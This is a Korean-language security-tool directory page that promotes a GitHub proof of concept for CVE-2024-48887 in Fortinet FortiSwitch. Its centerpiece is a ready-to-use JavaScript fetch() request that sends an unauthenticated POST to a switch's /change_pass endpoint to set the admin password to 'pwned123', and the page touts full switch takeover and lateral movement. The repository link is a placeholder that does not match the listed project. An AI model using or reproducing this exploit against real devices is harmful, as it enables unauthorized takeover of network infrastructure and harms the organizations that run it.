Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — 취약한 Fortinet FortiSwitch GUI 엔드포인트에서 인가되지 않은 비밀번호 변경이 어떻게 유발될 수 있는지 보여주는 경량 JavaScript 스니펫입니다. | Kitploit
도구/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
Vulnerability AnalysisExploitationLateral MovementWeb Application ExploitationPenetration TestingRed Teaming
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

취약한 Fortinet FortiSwitch GUI 엔드포인트에서 인가되지 않은 비밀번호 변경이 어떻게 유발될 수 있는지 보여주는 경량 JavaScript 스니펫입니다.

저장소 보기
231년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-48887-FortiSwitch-Exploit

🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 방금 가벼운 JavaScript 스니펫을 공개했습니다. 취약한 Fortinet FortiSwitch GUI 엔드포인트에서 인증 없이 비밀번호 변경이 어떻게 트리거될 수 있는지 보여줍니다.

🛠️ 취약점 정보: 공격자는 간단한 fetch() 요청을 구성하여 인증 없이 비밀번호 설정을 조작할 수 있으며, /change_pass 엔드포인트 변형을 직접 대상으로 합니다.

root@kitploit:~
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 영향: 전체 스위치 장악, 측면 이동 가능성, 네트워크 손상.

📁 레포지토리: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ 레포지토리에 별표를 누르고 정보보안 동료들과 공유하세요!

📢 전체 분석 및 실시간 알림은 @cybersecplayground를 통해 팔로우하세요.

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

도구 다운로드